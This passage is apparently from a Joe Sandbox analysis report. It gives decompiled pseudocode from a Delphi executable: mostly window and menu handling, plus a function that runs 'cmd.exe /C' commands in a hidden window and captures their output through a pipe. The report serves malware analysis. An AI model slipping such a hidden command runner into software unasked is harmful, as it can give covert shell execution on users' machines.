                                                    						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {   // poScreenCenter, or poMainFormCenter for an MDI child: centre on the screen or the MDI client
                                                    							if( *((char*)(_v8 + 0x22f)) != 1) {
                                                    								_t301 = E004581F4() -  *(_v8 + 0x48);
                                                    								__eflags = _t301;
                                                    								_t302 = _t301 >> 1;
                                                    								if(_t301 < 0) {
                                                    									asm("adc ebx, 0x0");
                                                    								}
                                                    								_t198 = E004581E8() -  *(_v8 + 0x4c);
                                                    								__eflags = _t198;
                                                    								_t199 = _t198 >> 1;
                                                    								if(_t198 < 0) {
                                                    									asm("adc eax, 0x0");
                                                    								}
                                                    							} else {
                                                    								_t241 =  *0x49ebb8; // 0x0
                                                    								_t305 = E0043A980( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
                                                    								_t302 = _t305 >> 1;
                                                    								if(_t305 < 0) {
                                                    									asm("adc ebx, 0x0");
                                                    								}
                                                    								_t245 =  *0x49ebb8; // 0x0
                                                    								_t248 = E0043A9C4( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
                                                    								_t199 = _t248 >> 1;
                                                    								if(_t248 < 0) {
                                                    									asm("adc eax, 0x0");
                                                    								}
                                                    							}
                                                    							if(_t302 < 0) {
                                                    								_t302 = 0;
                                                    							}
                                                    							if(_t199 < 0) {
                                                    								_t199 = 0;
                                                    							}
                                                    							_t326 = _t199;
                                                    							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                    							if( *((char*)(_v8 + 0x57)) != 0) {
                                                    								E00454DB8(_v8, _t326);
                                                    							}
                                                    						} else {
                                                    							_t251 =  *((intOrPtr*)(_v8 + 0x230));
                                                    							__eflags = _t251 + 0xfa - 2;
                                                    							if(_t251 + 0xfa - 2 >= 0) {                   // Position not in {6, 7} (those take the else branch); only poDesktopCenter (5) is left to handle here
                                                    								__eflags = _t251 - 5;
                                                    								if(_t251 == 5) {
                                                    									_t252 = _v8;
                                                    									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
                                                    									if( *((char*)(_t252 + 0x22f)) != 1) {
                                                    										_t307 = E00458224() -  *(_v8 + 0x48);
                                                    										__eflags = _t307;
                                                    										_t308 = _t307 >> 1;
                                                    										if(_t307 < 0) {
                                                    											asm("adc ebx, 0x0");
                                                    										}
                                                    										_t258 = E00458218() -  *(_v8 + 0x4c);
                                                    										__eflags = _t258;
                                                    										_t259 = _t258 >> 1;
                                                    										if(_t258 < 0) {
                                                    											asm("adc eax, 0x0");
                                                    										}
                                                    									} else {
                                                    										_t262 =  *0x49ebb8; // 0x0
                                                    										_t311 = E0043A980( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
                                                    										__eflags = _t311;
                                                    										_t308 = _t311 >> 1;
                                                    										if(_t311 < 0) {
                                                    											asm("adc ebx, 0x0");
                                                    										}
                                                    										_t266 =  *0x49ebb8; // 0x0
                                                    										_t269 = E0043A9C4( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
                                                    										__eflags = _t269;
                                                    										_t259 = _t269 >> 1;
                                                    										if(_t269 < 0) {
                                                    											asm("adc eax, 0x0");
                                                    										}
                                                    									}
                                                    									__eflags = _t308;
                                                    									if(_t308 < 0) {
                                                    										_t308 = 0;
                                                    										__eflags = 0;
                                                    									}
                                                    									__eflags = _t259;
                                                    									if(_t259 < 0) {
                                                    										_t259 = 0;
                                                    										__eflags = 0;
                                                    									}
                                                    									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                    								}
                                                    							} else {
                                                    								_t270 =  *0x49ebb8; // 0x0
                                                    								_t370 =  *(_t270 + 0x44);
                                                    								_t271 = _v8;
                                                    								__eflags =  *((char*)(_t271 + 0x230)) - 7;
                                                    								if( *((char*)(_t271 + 0x230)) == 7) {
                                                    									_t362 =  *0x44ff0c; // 0x44ff58
                                                    									_t290 = E00403D78( *(_v8 + 4), _t362);
                                                    									__eflags = _t290;
                                                    									if(_t290 != 0) {
                                                    										_t370 =  *(_v8 + 4);
                                                    									}
                                                    								}
                                                    								__eflags = _t370;
                                                    								if(_t370 == 0) {
                                                    									_t313 = E004581F4() -  *(_v8 + 0x48);
                                                    									__eflags = _t313;
                                                    									_t314 = _t313 >> 1;
                                                    									if(_t313 < 0) {
                                                    										asm("adc ebx, 0x0");
                                                    									}
                                                    									_t277 = E004581E8() -  *(_v8 + 0x4c);
                                                    									__eflags = _t277;
                                                    									_t278 = _t277 >> 1;
                                                    									if(_t277 < 0) {
                                                    										asm("adc eax, 0x0");
                                                    									}
                                                    								} else {
                                                    									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
                                                    									__eflags = _t317;
                                                    									_t318 = _t317 >> 1;
                                                    									if(_t317 < 0) {
                                                    										asm("adc ebx, 0x0");
                                                    									}
                                                    									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
                                                    									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
                                                    									__eflags = _t286;
                                                    									_t287 = _t286 >> 1;
                                                    									if(_t286 < 0) {
                                                    										asm("adc eax, 0x0");
                                                    									}
                                                    									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
                                                    								}
                                                    								__eflags = _t314;
                                                    								if(_t314 < 0) {
                                                    									_t314 = 0;
                                                    									__eflags = 0;
                                                    								}
                                                    								__eflags = _t278;
                                                    								if(_t278 < 0) {
                                                    									_t278 = 0;
                                                    									__eflags = 0;
                                                    								}
                                                    								_t328 = _t278;
                                                    								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                    								_t281 = _v8;
                                                    								__eflags =  *((char*)(_t281 + 0x57));
                                                    								if( *((char*)(_t281 + 0x57)) != 0) {
                                                    									E00454DB8(_v8, _t328);
                                                    								}
                                                    							}
                                                    						}
                                                    						 *((char*)(_v8 + 0x230)) = 0;
                                                    						if( *((char*)(_v8 + 0x22f)) != 1) {
                                                    							ShowWindow(E00441704(_v8),  *(0x49bee0 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                                    						} else {
                                                    							if( *(_v8 + 0x22b) != 2) {
                                                    								ShowWindow(E00441704(_v8),  *(0x49bee0 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                                    								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
                                                    								__eflags = _t220;
                                                    								CallWindowProcA(0x407538, E00441704(_v8), 5, 0, _t220);
                                                    								E0043B1DC();
                                                    							} else {
                                                    								_t231 = E00441704(_v8);
                                                    								_t232 =  *0x49ebb8; // 0x0
                                                    								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
                                                    								ShowWindow(E00441704(_v8), 3);
                                                    							}
                                                    							_t226 =  *0x49ebb8; // 0x0
                                                    							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
                                                    						}
                                                    					}
                                                    				}
                                                    				_pop(_t331);
                                                    				 *[fs:eax] = _t331;
                                                    				_push(0x456eb0);
                                                    				_t154 = _v8;
                                                    				 *(_t154 + 0x2f4) =  *(_t154 + 0x2f4) & 0x000000fb;
                                                    				return _t154;
                                                    			}

                                                    APIs
                                                    • SendMessageA.USER32(?,00000223,00000000,00000000), ref: 00456CDD
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LoadMessageSendString
                                                    • String ID: @/B
                                                    • API String ID: 1946433856-85281795
                                                    • Opcode ID: f732cc950298462dbf8775e8013057fa37c1ddea6ba143f1f22029aec632b822
                                                    • Instruction ID: 4b6bfc7c0ddb1c0560f123697eaff68a2ce520b055fb56cf76eb45ff435e8cfa
                                                    • Opcode Fuzzy Hash: f732cc950298462dbf8775e8013057fa37c1ddea6ba143f1f22029aec632b822
                                                    • Instruction Fuzzy Hash: 18F14E30A00204EFDB01DBA9C985F9E77F5AB05305F6545B6E944AB3A3D738BE44DB48
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 38%
                                                    			E00475384(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				void* _v16;
                                                    				void* _v20;
                                                    				long _v24;
                                                    				char _v28;
                                                    				struct _SECURITY_ATTRIBUTES _v40;
                                                    				struct _STARTUPINFOA _v108;
                                                    				struct _PROCESS_INFORMATION _v124;
                                                    				char _v380;
                                                    				char _v384;
                                                    				char _v388;
                                                    				CHAR* _t77;
                                                    				void* _t112;
                                                    				intOrPtr _t125;
                                                    				intOrPtr _t126;
                                                    				void* _t131;
                                                    				void* _t133;
                                                    				void* _t134;
                                                    				intOrPtr _t135;
                                                    
                                                    				_t133 = _t134;
                                                    				_t135 = _t134 + 0xfffffe80;
                                                    				_v388 = 0;
                                                    				_v384 = 0;
                                                    				_v28 = 0;
                                                    				_t131 = __ecx;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				E00404E70(_v8);
                                                    				E00404E70(_v12);
                                                    				_push(_t133);
                                                    				_push(0x4755bb);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t135;
                                                    				E004049C0(__ecx);
                                                    				_v40.nLength = 0xc;
                                                    				_v40.bInheritHandle = 0xffffffff;
                                                    				_v40.lpSecurityDescriptor = 0;
                                                    				CreatePipe( &_v16,  &_v20,  &_v40, 0);
                                                    				_push(_t133);
                                                    				_push(0x475581);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t135;
                                                    				E004032B4( &_v108, 0x44);
                                                    				_v108.cb = 0x44;
                                                    				_v108.dwFlags = 0x101;
                                                    				_v108.wShowWindow = 0;
                                                    				_v108.hStdInput = GetStdHandle(0xfffffff6);
                                                    				_v108.hStdOutput = _v20;
                                                    				_v108.hStdError = _v20;
                                                    				if(E00409A58(_v12) == 0) {
                                                    					E00404A58( &_v28, 0x4755d0);
                                                    				} else {
                                                    					E00404A58( &_v28, _v12);
                                                    				}
                                                    				_t77 = E00404E80(_v28);
                                                    				E00404CCC( &_v384, _v8, "cmd.exe /C ");
                                                    				CreateProcessA(0, E00404E80(_v384), 0, 0, 0xffffffff, 0, 0, _t77,  &_v108,  &_v124);
                                                    				asm("sbb ebx, ebx");
                                                    				_t112 = 1;
                                                    				CloseHandle(_v20);
                                                    				if(1 == 0) {
                                                    					_pop(_t125);
                                                    					 *[fs:eax] = _t125;
                                                    					_push(0x475588);
                                                    					return CloseHandle(_v16);
                                                    				} else {
                                                    					_push(_t133);
                                                    					_push(0x475563);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t135;
                                                    					do {
                                                    						ReadFile(_v16,  &_v380, 0xff,  &_v24, 0);
                                                    						asm("sbb ebx, ebx");
                                                    						_t112 = _t112 + 1;
                                                    						if(_v24 > 0) {
                                                    							 *((char*)(_t133 + _v24 - 0x178)) = 0;
                                                    							OemToCharA( &_v380,  &_v380);
                                                    							E00404C30( &_v388, 0x100,  &_v380);
                                                    							E00404C88(_t131, _v388);
                                                    						}
                                                    					} while (_t112 != 0 && _v24 != 0);
                                                    					WaitForSingleObject(_v124.hProcess, 0xffffffff);
                                                    					_pop(_t126);
                                                    					 *[fs:eax] = _t126;
                                                    					_push(0x47556a);
                                                    					CloseHandle(_v124.hThread);
                                                    					return CloseHandle(_v124);
                                                    				}
                                                    			}

                                                    APIs
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000,?,?,?,?,00000000,004755BB), ref: 004753EE
                                                    • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,?,?,00000000,00475581,?,?,?), ref: 00475426
                                                      • Part of subcall function 00409A58: GetFileAttributesA.KERNEL32(00000000,?,00473256,?,?,00000000,00000005,?,00000000,004732A8,?,00000000,00473306), ref: 00409A63
                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,000000F6), ref: 0047549C
                                                    • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,000000F6), ref: 004754AB
                                                    • ReadFile.KERNEL32(?,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004754DC
                                                    • OemToCharA.USER32 ref: 00475506
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF), ref: 0047553E
                                                    • CloseHandle.KERNEL32(?,0047556A,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF,00000000), ref: 00475554
                                                    • CloseHandle.KERNEL32(?,?,0047556A,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF), ref: 0047555D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Handle$Close$CreateFile$AttributesCharObjectPipeProcessReadSingleWait
                                                    • String ID: C:\$D$cmd.exe /C
                                                    • API String ID: 3269375759-2807548070
                                                    • Opcode ID: 337c76df8ed0ba55073ab9dc257bd6663246026ec8d7fff9333260b9ae0deff7
                                                    • Instruction ID: 82437ea0ccec46d2af5a08e72f5cf6232f0238eba76bb00f3cc1c06be9a4dd54
                                                    • Opcode Fuzzy Hash: 337c76df8ed0ba55073ab9dc257bd6663246026ec8d7fff9333260b9ae0deff7
                                                    • Instruction Fuzzy Hash: 6E5150B1904608AFDB10EFA5C881BDEB7B8EB48314F51457AF518F72C1DB785E448B68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 91%
                                                    			E0044EA40(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                    				intOrPtr _v8;
                                                    				struct HMENU__* _v12;
                                                    				signed int _v16;
                                                    				char _v17;
                                                    				intOrPtr _v24;
                                                    				int _v28;
                                                    				struct HDC__* _v32;
                                                    				intOrPtr _v36;
                                                    				intOrPtr _v40;
                                                    				intOrPtr _v44;
                                                    				intOrPtr* _v48;
                                                    				char _v52;
                                                    				intOrPtr _t137;
                                                    				signed int _t138;
                                                    				intOrPtr _t144;
                                                    				signed int _t150;
                                                    				signed int _t151;
                                                    				intOrPtr* _t153;
                                                    				void* _t158;
                                                    				struct HMENU__* _t160;
                                                    				intOrPtr* _t165;
                                                    				void* _t173;
                                                    				signed int _t177;
                                                    				signed int _t181;
                                                    				void* _t182;
                                                    				void* _t214;
                                                    				struct HDC__* _t221;
                                                    				void* _t251;
                                                    				signed int _t257;
                                                    				void* _t265;
                                                    				signed int _t271;
                                                    				signed int _t272;
                                                    				signed int _t274;
                                                    				signed int _t275;
                                                    				signed int _t277;
                                                    				signed int _t278;
                                                    				signed int _t280;
                                                    				signed int _t281;
                                                    				signed int _t283;
                                                    				signed int _t284;
                                                    				signed int _t286;
                                                    				signed int _t287;
                                                    				signed int _t290;
                                                    				signed int _t291;
                                                    				intOrPtr _t307;
                                                    				intOrPtr _t311;
                                                    				intOrPtr _t333;
                                                    				intOrPtr _t342;
                                                    				intOrPtr _t346;
                                                    				intOrPtr* _t353;
                                                    				signed int _t355;
                                                    				intOrPtr* _t356;
                                                    				signed int _t367;
                                                    				signed int _t368;
                                                    				signed int _t369;
                                                    				signed int _t370;
                                                    				signed int _t371;
                                                    				signed int _t372;
                                                    				signed int _t373;
                                                    				intOrPtr* _t375;
                                                    				void* _t377;
                                                    				void* _t378;
                                                    				intOrPtr _t379;
                                                    				void* _t380;
                                                    
                                                    				_t377 = _t378;
                                                    				_t379 = _t378 + 0xffffffd0;
                                                    				_v52 = 0;
                                                    				_t375 = __edx;
                                                    				_v8 = __eax;
                                                    				_push(_t377);
                                                    				_push(0x44ef73);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t379;
                                                    				_t137 =  *__edx;
                                                    				_t380 = _t137 - 0x111;
                                                    				if(_t380 > 0) {
                                                    					_t138 = _t137 - 0x117;
                                                    					__eflags = _t138;
                                                    					if(_t138 == 0) {
                                                    						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                    						__eflags = _t271;
                                                    						if(_t271 < 0) {
                                                    							goto L67;
                                                    						} else {
                                                    							_t272 = _t271 + 1;
                                                    							_t367 = 0;
                                                    							__eflags = 0;
                                                    							while(1) {
                                                    								_t150 = E0044DDEC(E0041AC6C(_v8, _t367),  *(_t375 + 4), __eflags);
                                                    								__eflags = _t150;
                                                    								if(_t150 != 0) {
                                                    									goto L68;
                                                    								}
                                                    								_t367 = _t367 + 1;
                                                    								_t272 = _t272 - 1;
                                                    								__eflags = _t272;
                                                    								if(_t272 != 0) {
                                                    									continue;
                                                    								} else {
                                                    									goto L67;
                                                    								}
                                                    								goto L68;
                                                    							}
                                                    						}
                                                    					} else {
                                                    						_t151 = _t138 - 8;
                                                    						__eflags = _t151;
                                                    						if(_t151 == 0) {
                                                    							_v17 = 0;
                                                    							__eflags =  *(__edx + 6) & 0x00000010;
                                                    							if(( *(__edx + 6) & 0x00000010) != 0) {
                                                    								_v17 = 1;
                                                    							}
                                                    							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                    							__eflags = _t274;
                                                    							if(__eflags < 0) {
                                                    								L32:
                                                    								_t153 =  *0x49dbcc; // 0x49ebb8
                                                    								E0045B010( *_t153, 0, __eflags);
                                                    								goto L67;
                                                    							} else {
                                                    								_t275 = _t274 + 1;
                                                    								_t368 = 0;
                                                    								__eflags = 0;
                                                    								while(1) {
                                                    									__eflags = _v17 - 1;
                                                    									if(_v17 != 1) {
                                                    										_v12 =  *(_t375 + 4) & 0x0000ffff;
                                                    									} else {
                                                    										_t160 =  *(_t375 + 8);
                                                    										__eflags = _t160;
                                                    										if(_t160 == 0) {
                                                    											_v12 = 0xffffffff;
                                                    										} else {
                                                    											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
                                                    										}
                                                    									}
                                                    									_t158 = E0041AC6C(_v8, _t368);
                                                    									_t295 = _v17;
                                                    									_v16 = E0044DD30(_t158, _v17, _v12);
                                                    									__eflags = _v16;
                                                    									if(__eflags != 0) {
                                                    										break;
                                                    									}
                                                    									_t368 = _t368 + 1;
                                                    									_t275 = _t275 - 1;
                                                    									__eflags = _t275;
                                                    									if(__eflags != 0) {
                                                    										continue;
                                                    									} else {
                                                    										goto L32;
                                                    									}
                                                    									goto L68;
                                                    								}
                                                    								E004380E0( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
                                                    								_t165 =  *0x49dbcc; // 0x49ebb8
                                                    								E0045B010( *_t165, _v52, __eflags);
                                                    							}
                                                    						} else {
                                                    							__eflags = _t151 == 1;
                                                    							if(_t151 == 1) {
                                                    								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                    								__eflags = _t277;
                                                    								if(_t277 < 0) {
                                                    									goto L67;
                                                    								} else {
                                                    									_t278 = _t277 + 1;
                                                    									_t369 = 0;
                                                    									__eflags = 0;
                                                    									while(1) {
                                                    										_v48 = E0041AC6C(_v8, _t369);
                                                    										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
                                                    										__eflags = _t173 -  *(_t375 + 8);
                                                    										if(_t173 ==  *(_t375 + 8)) {
                                                    											break;
                                                    										}
                                                    										_t177 = E0044DD30(_v48, 1,  *(_t375 + 8));
                                                    										__eflags = _t177;
                                                    										if(_t177 == 0) {
                                                    											_t369 = _t369 + 1;
                                                    											_t278 = _t278 - 1;
                                                    											__eflags = _t278;
                                                    											if(_t278 != 0) {
                                                    												continue;
                                                    											} else {
                                                    												goto L67;
                                                    											}
                                                    										} else {
                                                    											break;
                                                    										}
                                                    										goto L68;
                                                    									}
                                                    									E0044E630(_v48, _t375);
                                                    								}
                                                    							} else {
                                                    								goto L67;
                                                    							}
                                                    						}
                                                    					}
                                                    					goto L68;
                                                    				} else {
                                                    					if(_t380 == 0) {
                                                    						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                    						__eflags = _t280;
                                                    						if(_t280 < 0) {
                                                    							goto L67;
                                                    						} else {
                                                    							_t281 = _t280 + 1;
                                                    							_t370 = 0;
                                                    							__eflags = 0;
                                                    							while(1) {
                                                    								E0041AC6C(_v8, _t370);
                                                    								_t181 = E0044DDD0( *(_t375 + 4), __eflags);
                                                    								__eflags = _t181;
                                                    								if(_t181 != 0) {
                                                    									goto L68;
                                                    								}
                                                    								_t370 = _t370 + 1;
                                                    								_t281 = _t281 - 1;
                                                    								__eflags = _t281;
                                                    								if(_t281 != 0) {
                                                    									continue;
                                                    								} else {
                                                    									goto L67;
                                                    								}
                                                    								goto L68;
                                                    							}
                                                    						}
                                                    						goto L68;
                                                    					} else {
                                                    						_t182 = _t137 - 0x2b;
                                                    						if(_t182 == 0) {
                                                    							_v40 =  *((intOrPtr*)(__edx + 8));
                                                    							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                    							__eflags = _t283;
                                                    							if(_t283 < 0) {
                                                    								goto L67;
                                                    							} else {
                                                    								_t284 = _t283 + 1;
                                                    								_t371 = 0;
                                                    								__eflags = 0;
                                                    								while(1) {
                                                    									_v16 = E0044DD30(E0041AC6C(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
                                                    									__eflags = _v16;
                                                    									if(_v16 != 0) {
                                                    										break;
                                                    									}
                                                    									_t371 = _t371 + 1;
                                                    									_t284 = _t284 - 1;
                                                    									__eflags = _t284;
                                                    									if(_t284 != 0) {
                                                    										continue;
                                                    									} else {
                                                    										goto L67;
                                                    									}
                                                    									goto L69;
                                                    								}
                                                    								_v24 = E0042572C(0, 1);
                                                    								_push(_t377);
                                                    								_push(0x44eda6);
                                                    								_push( *[fs:eax]);
                                                    								 *[fs:eax] = _t379;
                                                    								_v28 = SaveDC( *(_v40 + 0x18));
                                                    								_push(_t377);
                                                    								_push(0x44ed89);
                                                    								_push( *[fs:eax]);
                                                    								 *[fs:eax] = _t379;
                                                    								E00425CE8(_v24,  *(_v40 + 0x18));
                                                    								E00425B88(_v24);
                                                    								E0044F218(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
                                                    								_pop(_t333);
                                                    								 *[fs:eax] = _t333;
                                                    								_push(0x44ed90);
                                                    								__eflags = 0;
                                                    								E00425CE8(_v24, 0);
                                                    								return RestoreDC( *(_v40 + 0x18), _v28);
                                                    							}
                                                    						} else {
                                                    							_t214 = _t182 - 1;
                                                    							if(_t214 == 0) {
                                                    								_v44 =  *((intOrPtr*)(__edx + 8));
                                                    								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                    								__eflags = _t286;
                                                    								if(_t286 < 0) {
                                                    									goto L67;
                                                    								} else {
                                                    									_t287 = _t286 + 1;
                                                    									_t372 = 0;
                                                    									__eflags = 0;
                                                    									while(1) {
                                                    										_v16 = E0044DD30(E0041AC6C(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
                                                    										__eflags = _v16;
                                                    										if(_v16 != 0) {
                                                    											break;
                                                    										}
                                                    										_t372 = _t372 + 1;
                                                    										_t287 = _t287 - 1;
                                                    										__eflags = _t287;
                                                    										if(_t287 != 0) {
                                                    											continue;
                                                    										} else {
                                                    											goto L67;
                                                    										}
                                                    										goto L69;
                                                    									}
                                                    									_t221 =  *((intOrPtr*)(_v8 + 0x10));
                                                    									L00407730();
                                                    									_v32 = _t221;
                                                    									 *[fs:eax] = _t379;
                                                    									_v24 = E0042572C(0, 1);
                                                    									 *[fs:eax] = _t379;
                                                    									_v28 = SaveDC(_v32);
                                                    									 *[fs:eax] = _t379;
                                                    									E00425CE8(_v24, _v32);
                                                    									E00425B88(_v24);
                                                    									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x44eea7, _t377,  *[fs:eax], 0x44eec4, _t377,  *[fs:eax], 0x44eee9, _t377, _t221);
                                                    									_pop(_t342);
                                                    									 *[fs:eax] = _t342;
                                                    									_push(0x44eeae);
                                                    									__eflags = 0;
                                                    									E00425CE8(_v24, 0);
                                                    									return RestoreDC(_v32, _v28);
                                                    								}
                                                    							} else {
                                                    								if(_t214 == 0x27) {
                                                    									_v36 =  *((intOrPtr*)(__edx + 8));
                                                    									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                    									__eflags = _t290;
                                                    									if(_t290 < 0) {
                                                    										goto L67;
                                                    									} else {
                                                    										_t291 = _t290 + 1;
                                                    										_t373 = 0;
                                                    										__eflags = 0;
                                                    										while(1) {
                                                    											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E0041AC6C(_v8, _t373))) + 0x34))();
                                                    											_t346 = _v36;
                                                    											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
                                                    											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
                                                    												_v16 = E0044DD30(E0041AC6C(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
                                                    											} else {
                                                    												_v16 =  *((intOrPtr*)(E0041AC6C(_v8, _t373) + 0x34));
                                                    											}
                                                    											__eflags = _v16;
                                                    											if(_v16 != 0) {
                                                    												break;
                                                    											}
                                                    											_t373 = _t373 + 1;
                                                    											_t291 = _t291 - 1;
                                                    											__eflags = _t291;
                                                    											if(_t291 != 0) {
                                                    												continue;
                                                    											} else {
                                                    												goto L67;
                                                    											}
                                                    											goto L68;
                                                    										}
                                                    										_t257 = E0044DD60(E0041AC6C(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
                                                    										__eflags = _t257;
                                                    										if(_t257 == 0) {
                                                    											_t265 = E0041AC6C(_v8, _t373);
                                                    											__eflags = 0;
                                                    											_t257 = E0044DD60(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
                                                    										}
                                                    										_t353 =  *0x49de0c; // 0x49ebbc
                                                    										_t355 =  *( *_t353 + 0x6c);
                                                    										__eflags = _t355;
                                                    										if(_t355 != 0) {
                                                    											__eflags = _t257;
                                                    											if(_t257 == 0) {
                                                    												_t257 =  *(_t355 + 0x158);
                                                    											}
                                                    											_t307 =  *0x49de0c; // 0x49ebbc
                                                    											__eflags =  *(_t355 + 0x228) & 0x00000008;
                                                    											if(( *(_t355 + 0x228) & 0x00000008) == 0) {
                                                    												_t356 =  *0x49dbcc; // 0x49ebb8
                                                    												E0045ACB4( *_t356, _t291, _t307, _t257, _t373, _t375);
                                                    											} else {
                                                    												E0045AD1C();
                                                    											}
                                                    										}
                                                    									}
                                                    								} else {
                                                    									L67:
                                                    									_push( *(_t375 + 8));
                                                    									_push( *(_t375 + 4));
                                                    									_push( *_t375);
                                                    									_t144 =  *((intOrPtr*)(_v8 + 0x10));
                                                    									_push(_t144);
                                                    									L00407540();
                                                    									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
                                                    								}
                                                    								L68:
                                                    								_pop(_t311);
                                                    								 *[fs:eax] = _t311;
                                                    								_push(0x44ef7a);
                                                    								return E004049C0( &_v52);
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				L69:
                                                    			}
                                                    0x0044ea41
                                                    0x0044ea43
                                                    0x0044ea4b
                                                    0x0044ea4e
                                                    0x0044ea50
                                                    0x0044ea55
                                                    0x0044ea56
                                                    0x0044ea5b
                                                    0x0044ea5e
                                                    0x0044ea61
                                                    0x0044ea63
                                                    0x0044ea68
                                                    0x0044ea8a
                                                    0x0044ea8a
                                                    0x0044ea8f
                                                    0x0044eade
                                                    0x0044eadf
                                                    0x0044eae1
                                                    0x00000000
                                                    0x0044eae7
                                                    0x0044eae7
                                                    0x0044eae8
                                                    0x0044eae8
                                                    0x0044eaea
                                                    0x0044eaf7
                                                    0x0044eafc
                                                    0x0044eafe
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eb04
                                                    0x0044eb05
                                                    0x0044eb05
                                                    0x0044eb06
                                                    0x00000000
                                                    0x0044eb08
                                                    0x00000000
                                                    0x0044eb08
                                                    0x00000000
                                                    0x0044eb06
                                                    0x0044eaea
                                                    0x0044ea91
                                                    0x0044ea91
                                                    0x0044ea91
                                                    0x0044ea94
                                                    0x0044eb0d
                                                    0x0044eb11
                                                    0x0044eb15
                                                    0x0044eb17
                                                    0x0044eb17
                                                    0x0044eb21
